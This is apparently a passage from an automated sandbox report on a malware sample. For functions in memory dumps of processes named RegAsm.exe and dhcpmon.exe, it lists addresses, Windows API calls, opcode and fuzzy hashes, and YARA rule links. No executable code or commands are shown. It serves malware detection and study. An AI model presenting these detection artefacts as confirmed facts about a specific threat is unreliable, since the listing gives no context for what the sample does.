                                                                            • Instruction ID: 09cbad713b172933686573c5fe2ff80b8d0be0ee3566aa9f8d4f03414548e828
                                                                            • Opcode Fuzzy Hash: dcab54399b9cdec7f35fbc48794248efdd388d3182e273703574d8fcbbe9aed3
                                                                            • Instruction Fuzzy Hash: 6C11F2B1C006498FCB10CF9AD548BCEFBF4AB48324F10C51AD829A3340D379A548CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05095A48, Relevance: 1.5, APIs: 1, Instructions: 46registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0509642F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: fd1ceb950714db6eec8f07d31f757d2f86e8da4b93d357cc6b321c28aa36fd26
                                                                            • Instruction ID: 3fbf1f9582ff6f5b98db4b239b11c7fbf6e6efaaa0be917dede1b64d74d46689
                                                                            • Opcode Fuzzy Hash: fd1ceb950714db6eec8f07d31f757d2f86e8da4b93d357cc6b321c28aa36fd26
                                                                            • Instruction Fuzzy Hash: 3F1112B19046498FCB20DF9AD588BDEFBF4EF88324F10841AD959A7340D775A948CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,?,?), ref: 029BFE9D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LongWindow
                                                                            • String ID:
                                                                            • API String ID: 1378638983-0
                                                                            • Opcode ID: 0f3db8cc164d2c504989e8cf26e9e5360b629f740928ae282cdedc4a1b93018c
                                                                            • Instruction ID: 182d744348bbf7a18564593738e80bf2304841f1fec1b5a2beca74a29fa00d4a
                                                                            • Opcode Fuzzy Hash: 0f3db8cc164d2c504989e8cf26e9e5360b629f740928ae282cdedc4a1b93018c
                                                                            • Instruction Fuzzy Hash: 491115B59002098FDB10CF9AD585BDFFBF8EB88324F10841AE858A7741D374A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05090440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DispatchMessage
                                                                            • String ID:
                                                                            • API String ID: 2061451462-0
                                                                            • Opcode ID: f47653da3ab2c17055d936fe80929d91a091a7a24a313b865b8bea3462ad7e26
                                                                            • Instruction ID: c5670232744302a5fdbdbd6d0bb1666a624b56676e55f9e508e382ccb65151f4
                                                                            • Opcode Fuzzy Hash: f47653da3ab2c17055d936fe80929d91a091a7a24a313b865b8bea3462ad7e26
                                                                            • Instruction Fuzzy Hash: 2C11D0B1D046498FCB10CF9AD548BDEFBF4EB88324F10852AD869A7240D378A545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050963CA, Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCloseKey.KERNEL32(00000000), ref: 0509642F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: b384b3e25b3cc846bdd55857f640dae376d4c307ce7977297be525ed92d3293b
                                                                            • Instruction ID: a164bd6b34070f657337836451acf95258648d34a32f5fe0dbda2d453f7fa586
                                                                            • Opcode Fuzzy Hash: b384b3e25b3cc846bdd55857f640dae376d4c307ce7977297be525ed92d3293b
                                                                            • Instruction Fuzzy Hash: FF1100B59002098FCB10CF99D585BDEFBF4AF48224F11841AD529A7340D779A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00CED1D8, Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.477574623.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 105b277e9ec2b46957b88aa9d66d1944776f5698efc0b67f3891aa40d393ccbf
                                                                            • Instruction ID: c44528814351d46d2e647ba904f21d64d7b80bbcaa5043a6c5a63bd5b9eff805
                                                                            • Opcode Fuzzy Hash: 105b277e9ec2b46957b88aa9d66d1944776f5698efc0b67f3891aa40d393ccbf
                                                                            • Instruction Fuzzy Hash: 4521F575504380DFCF05CF55D8C4B2ABB65FB88324F24C669EA0A4B246C33ADC56DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00CED4A0, Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.477574623.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 248995398932fa3d3a160828d33e1a11c9e213b089a6461ac754e7bc20c47aaa
                                                                            • Instruction ID: f35ac1d61bc739b658b00484c9c40fd9aaba6ad802e6c76d5dcb056237ed7a19
                                                                            • Opcode Fuzzy Hash: 248995398932fa3d3a160828d33e1a11c9e213b089a6461ac754e7bc20c47aaa
                                                                            • Instruction Fuzzy Hash: 492103B1504280DFDB05CF55D9C0B27BFA5FB98328F24C569E90A0B246C33AD956DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00CED1D3, Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.477574623.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e1fdde74b65ce1e1bdcf66fb37db4d7bff0b746c81c10753e9c1e2df04ce7e83
                                                                            • Instruction ID: 15bf63f3f6a0b45a2b9c9cc585ed3125caa05a881feb8276ec7ce03244111409
                                                                            • Opcode Fuzzy Hash: e1fdde74b65ce1e1bdcf66fb37db4d7bff0b746c81c10753e9c1e2df04ce7e83
                                                                            • Instruction Fuzzy Hash: BC219D76504280DFCB16CF50D9C4B16BF61FB84310F24C2AAD9090B656C33AD96ACBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00CED49B, Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.477574623.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3113e65d3a1fd7ea622a6671409d3473f2eeff48952b3e5bae18d1befbfb720c
                                                                            • Instruction ID: 9b48069e293ed3186b95c4cd455787e2d0a1b753948216bdc2e787be5973a674
                                                                            • Opcode Fuzzy Hash: 3113e65d3a1fd7ea622a6671409d3473f2eeff48952b3e5bae18d1befbfb720c
                                                                            • Instruction Fuzzy Hash: 5811D3B6404280CFCF12CF54D5C4B16BF71FB94324F24C6A9D8060B256C336D95ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07050B98, Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ea66262643841aa5c603944ef770b918a11f85631256eaed675daa2d70871a76
                                                                            • Instruction ID: d0c9dbf651338254dc8f82106306ef228287ac0675b621bea4847be64950429d
                                                                            • Opcode Fuzzy Hash: ea66262643841aa5c603944ef770b918a11f85631256eaed675daa2d70871a76
                                                                            • Instruction Fuzzy Hash: 0B012B603081E51FD355A63D481473FA9DB9BC9744F19C46EEA0BCB386CD748C0253A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07050C68, Relevance: .0, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69b073c2c5e2d8c90b8a967f244bbd9155acb3a03d279d79cf607025003e6731
                                                                            • Instruction ID: dae60ae22fc35b4b841a7d6fb2a8f6a646fb37bfeca17a09915ac942594003f2
                                                                            • Opcode Fuzzy Hash: 69b073c2c5e2d8c90b8a967f244bbd9155acb3a03d279d79cf607025003e6731
                                                                            • Instruction Fuzzy Hash: 1AF090B1A182199FD780EF7898156DFBBF0FB85210F204A6AD553DA240DB794A03CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07050C39, Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 416872583bdde2c05faac7c2c89f77b2ce58f4e1280880755b40b4cb088281f9
                                                                            • Instruction ID: 05eb9b50c45c91ac6b93ca67c78ba2eb21cf51bcb1105ff03d6de812199cc245
                                                                            • Opcode Fuzzy Hash: 416872583bdde2c05faac7c2c89f77b2ce58f4e1280880755b40b4cb088281f9
                                                                            • Instruction Fuzzy Hash: AAE0227131C740DFC3046B347C649AF3B23ABC6700F04C626F6079A286CAB2084383A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07050C78, Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 38509bb9d1722f4f742c61bd7d721a43371cf4945786750dcd3261bcfb95e6d8
                                                                            • Instruction ID: dc79a13286487201e6771341ef4e923067d637265dfbb8cde921d74aa65d79ae
                                                                            • Opcode Fuzzy Hash: 38509bb9d1722f4f742c61bd7d721a43371cf4945786750dcd3261bcfb95e6d8
                                                                            • Instruction Fuzzy Hash: 70E0B6B0D002099EC780EFA9851179EBBF0AB04204F2089698415EA241E77546058B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07050C48, Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.490262721.0000000007050000.00000040.00000001.sdmp, Offset: 07050000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5bd29a79daca79a9d1353a6f900d67048c3a05dc7079e77160c5e7fa0243140
                                                                            • Instruction ID: 14314468f84d39dae736827842d8006cbd2cad182703f5832fa8f74873c0a768
                                                                            • Opcode Fuzzy Hash: c5bd29a79daca79a9d1353a6f900d67048c3a05dc7079e77160c5e7fa0243140
                                                                            • Instruction Fuzzy Hash: 12C08C70228204D7CA289B2A7DA09AF375B53CA704F40C224B81A62184CEB278410640
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 06CC0C90, Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60e9e7117db3b259d9e82d12e1ccf35808c498e327ee556bd787902f040631ec
                                                                            • Instruction ID: ee621ce5b7aa9b29c7234e54dc1e3e98069a13125858e9bf6d1c769b7a490c6e
                                                                            • Opcode Fuzzy Hash: 60e9e7117db3b259d9e82d12e1ccf35808c498e327ee556bd787902f040631ec
                                                                            • Instruction Fuzzy Hash: 23018F31E01218DFCB48AFA5E4186EDBBB5EB4E322F10642DD105B3240DB714945CB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06CC0CA0, Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3c301eb8cd72d3566420a0531ad39584274f4fd4018f32ec1c4ff2a19953341
                                                                            • Instruction ID: 2125ad64e7cab9dff9ee88f98b65401572a42b5d5178fea9bd6cf1728ffc97c3
                                                                            • Opcode Fuzzy Hash: d3c301eb8cd72d3566420a0531ad39584274f4fd4018f32ec1c4ff2a19953341
                                                                            • Instruction Fuzzy Hash: C8F08130E012188FCB08AFAAD4587EDBBB5EB8E312F04542DD105B3280DB755944CB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: RegAsm.exe PID: 5432 Parent PID: 528 RegAsm.exeCOMMON

                                                                            Executed Functions

                                                                            Function 02F2189D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02F21A4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.326383828.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: PathSearch
                                                                            • String ID: 4Q4$4Q4
                                                                            • API String ID: 2203818243-3579632344
                                                                            • Opcode ID: fd68d255fd70ded137b72d47e82d791f6a019306735e751326560c71e072ca66
                                                                            • Instruction ID: 0246842ef363254e16458ad79aed41282dcbd369d84b025fd487d75db6f03694
                                                                            • Opcode Fuzzy Hash: fd68d255fd70ded137b72d47e82d791f6a019306735e751326560c71e072ca66
                                                                            • Instruction Fuzzy Hash: C9713371D002188FDB24CF99C994A9EBBF1BF49314F24812EE819AB351DB34A949CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02F218A8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02F21A4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.326383828.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: PathSearch
                                                                            • String ID: 4Q4$4Q4
                                                                            • API String ID: 2203818243-3579632344
                                                                            • Opcode ID: 7f4584c67885711b68fbe3118103880698e0ac5c35936a2b1c20f63a8ba09e32
                                                                            • Instruction ID: 79b29c65f0d6893d68917621fa167686aac0fb8d7838b516447a46db654e7004
                                                                            • Opcode Fuzzy Hash: 7f4584c67885711b68fbe3118103880698e0ac5c35936a2b1c20f63a8ba09e32
                                                                            • Instruction Fuzzy Hash: 9F714471D002188FDB24CF99C8907DEBBF1BF49314F24812AE919AB351DB34A949CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Analysis Process: dhcpmon.exe PID: 4300 Parent PID: 3388 dhcpmon.exeCOMMON

                                                                            Executed Functions

                                                                            Function 01040A30, Relevance: .4, Instructions: 440COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5cfba02d977ad97e72cbcae3f14e8b1c146998e6414fe1f85ab18ef0b760549
                                                                            • Instruction ID: 8c119bdf22c7e6dbe2bf881a71dee668739857bf5f02d7b5a247b3aa05220f33
                                                                            • Opcode Fuzzy Hash: c5cfba02d977ad97e72cbcae3f14e8b1c146998e6414fe1f85ab18ef0b760549
                                                                            • Instruction Fuzzy Hash: 8502C3707002158FCB15DFA8C880AEEB7F2EF84304B15C968E656AB395DB35EC46CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010405B0, Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 95cf93bbe8760c786a41aefa8b2042892fdcb6d94552899b00bc896ff6d97281
                                                                            • Instruction ID: 0e1a1aa091aaaae9614cedb219a74eab0f34de4a9437b4c7e0a544c3bfaa7065
                                                                            • Opcode Fuzzy Hash: 95cf93bbe8760c786a41aefa8b2042892fdcb6d94552899b00bc896ff6d97281
                                                                            • Instruction Fuzzy Hash: 4FC17074304306CFE719DF29C984B9937E2BF88304F148968EA869B369DB74EC41DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010404B0, Relevance: .1, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2460909dd2b44f2279ac0d8484f23bbc4a5d12e05f723c2dc636e8dc7c3b377f
                                                                            • Instruction ID: 4b1c2f99d226ccaa335d22e05d82b4a5e012d993cc47d37b4fdf51f890130216
                                                                            • Opcode Fuzzy Hash: 2460909dd2b44f2279ac0d8484f23bbc4a5d12e05f723c2dc636e8dc7c3b377f
                                                                            • Instruction Fuzzy Hash: 3C2187753106008FC74AEB78D4A49AD37E2AF8921832601A9E506CF7B2DF25DC06CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01041098, Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c9293418ce200933d09903af11c20cf4e7a060fc573b187f960ba857aa6067a
                                                                            • Instruction ID: 5729e59ee1511aecd0e75b2c1a4a06b0672b0e706e9f744bef086731186ccade
                                                                            • Opcode Fuzzy Hash: 0c9293418ce200933d09903af11c20cf4e7a060fc573b187f960ba857aa6067a
                                                                            • Instruction Fuzzy Hash: 9D1108307041545FC705EBB8E85469D7F75DF86244F1041BAE245DF792CE359C02DB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01040F48, Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c3ce6684db9dbc9846bc91cd330998f4191479345fad819a440cf3c7ab783735
                                                                            • Instruction ID: 919acc80cbe93201c0973e1c0bab792573cff4356c26f8af800cd9f445de4b91
                                                                            • Opcode Fuzzy Hash: c3ce6684db9dbc9846bc91cd330998f4191479345fad819a440cf3c7ab783735
                                                                            • Instruction Fuzzy Hash: DB0120B67012114FC7115B39F8C8D5E3BA4EF8575070547B4F9879B319CA30E801CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01041021, Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca5d4e42eef3dcf289d0b9b6023966eea7e9b518c0aceabf5e3ffc8e6aa5dd4a
                                                                            • Instruction ID: 8a270032eba074db153aaeebfcfbe3c9b7564894b5b17abcf2a41d134929420d
                                                                            • Opcode Fuzzy Hash: ca5d4e42eef3dcf289d0b9b6023966eea7e9b518c0aceabf5e3ffc8e6aa5dd4a
                                                                            • Instruction Fuzzy Hash: E9F052327092641FC31856385C606BF3BB9DFC621871904BFE00ACB382DE384C0693A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01040457, Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1537d6311fcf671fb8d920c4df31a44d291caabfc854c7241163bb661ca64bb1
                                                                            • Instruction ID: 30863ce47928722aeb647807ac45014a0f004206a3d22499883ccd59fbb2504e
                                                                            • Opcode Fuzzy Hash: 1537d6311fcf671fb8d920c4df31a44d291caabfc854c7241163bb661ca64bb1
                                                                            • Instruction Fuzzy Hash: 58F02275A0C28CAFCB07CFB99C859DEBFF9EE89100B1081FBE009D3252E63054018B01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01040468, Relevance: .0, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80f4220c0a53d3b7685e33b49899026dbac177555314ab3497523a59efd42dac
                                                                            • Instruction ID: 9acb5a70e16dabc96faa2def2374bad8d705b2d36161f7ab98868790c85ca3e4
                                                                            • Opcode Fuzzy Hash: 80f4220c0a53d3b7685e33b49899026dbac177555314ab3497523a59efd42dac
                                                                            • Instruction Fuzzy Hash: 1FE06D7260411DAF8B04DFA9A9895DABBEDFA88161B108166F009D2211EA30A4408B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01041139, Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 55ed1ccb0ad88e132797ef47d5caeff0037d6497fd7902e97316184319c10806
                                                                            • Instruction ID: bd8f75d50fc3c3f82b726266a76b763fa293021775076ae6e606e9c22bd795a0
                                                                            • Opcode Fuzzy Hash: 55ed1ccb0ad88e132797ef47d5caeff0037d6497fd7902e97316184319c10806
                                                                            • Instruction Fuzzy Hash: 22F05531B0C3A00FCB16AB74A860A9D3BB14F82108B154ABEC002CB693CA3518068B83
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01041089, Relevance: .0, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61cb68957af20de5e68b64eebb5bfc6c49030444c9baf26b291015a6e914a178
                                                                            • Instruction ID: 8b1decb84ab7f5f22f2467a9ec879a830c040ce8af2a9c49d8da07bb5ec989d7
                                                                            • Opcode Fuzzy Hash: 61cb68957af20de5e68b64eebb5bfc6c49030444c9baf26b291015a6e914a178
                                                                            • Instruction Fuzzy Hash: 43D02E32B0D3D08FCB1282B82DA90EC3F708C0300070903EBD8C9CB192CA54590987A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01040FE0, Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5415ab5483d4423aa206bc1f15e18d20d135b800e12282fb1695dc7cd7a58017
                                                                            • Instruction ID: 1c38a1906e170e1552a099721d5d89acf0670049a37f6cd52a085dbe6b79f1f4
                                                                            • Opcode Fuzzy Hash: 5415ab5483d4423aa206bc1f15e18d20d135b800e12282fb1695dc7cd7a58017
                                                                            • Instruction Fuzzy Hash: 4FE086341082D44FDF5A9B75E8A4A643FA09F45210B1803EAD0858B1A3C3686585DF00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01041108, Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d59d1816fe298b3e87c01527c0179488a9bb55a6b1df5eb883b03039c899068
                                                                            • Instruction ID: a3c08a44d7d0e4c53198766ba96ece1e9f0c61f508f95073f63b3cf86d63abc7
                                                                            • Opcode Fuzzy Hash: 5d59d1816fe298b3e87c01527c0179488a9bb55a6b1df5eb883b03039c899068
                                                                            • Instruction Fuzzy Hash: 86D05E323101208FC3099B68F898E913B74DB49610F1142ABF1058B262C6B2DC028B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01041190, Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000015.00000002.337536522.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 309dc982399febba145d218bd6621d5eb840a71973ddcf087fb359b52e36bb41
                                                                            • Instruction ID: af0e0e597976cdd0660c4ce3a2ab2c7f1ee533ee7fbd54453fe2e2fd78d11595
                                                                            • Opcode Fuzzy Hash: 309dc982399febba145d218bd6621d5eb840a71973ddcf087fb359b52e36bb41
                                                                            • Instruction Fuzzy Hash: 45C0124420F3C00FE74303B42C748243F700E8700478A40F7C0C48A4B381880019E73A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions